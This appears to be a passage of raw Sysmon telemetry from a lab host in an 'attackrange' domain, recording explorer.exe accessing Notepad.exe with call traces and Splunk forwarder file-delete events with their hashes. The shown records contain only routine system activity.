10341000x80000000000000001695710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.692{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46|C:\Windows\System32\SHLWAPI.dll+2a3c2|C:\Windows\System32\SHLWAPI.dll+1d9a4|C:\Windows\System32\COMDLG32.dll+666ad|C:\Windows\System32\COMDLG32.dll+30b1a 10341000x80000000000000001695709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.692{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46|C:\Windows\System32\SHLWAPI.dll+2a3c2|C:\Windows\System32\SHLWAPI.dll+1d9a4|C:\Windows\System32\COMDLG32.dll+666ad|C:\Windows\System32\COMDLG32.dll+30b1a 10341000x80000000000000001695708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.692{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46 10341000x80000000000000001695707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.692{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46|C:\Windows\System32\SHLWAPI.dll+2a3c2 23542300x80000000000000001695706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.232{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F084DBCADAE94E0C4C8BD8FDD2F6118C,SHA256=FD0398B1A690350C1258BA1ADF0A20C44EF30B5E7D265D7F9F109D9D93E5E4AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.161{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=454335514F27AE3561C07ACBEB68512B,SHA256=8877693B947D5F8D3351F9B8263DE0D0A310C72DE86667B9F0D2F19910DB7247,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.133{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=85BF917D2DABB7E87D22E636537C07BE,SHA256=9EFAC6007BCBA6CB34E8BE7BB353DBD1E56A38ED88A663827B4D073A48600DCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.132{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F891DAE098FA51E491091880C5EFF9C,SHA256=F8E48E2189749B549094FE6EE31A216EE2F2EDAC735F3572BB9314B0BCB72143,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2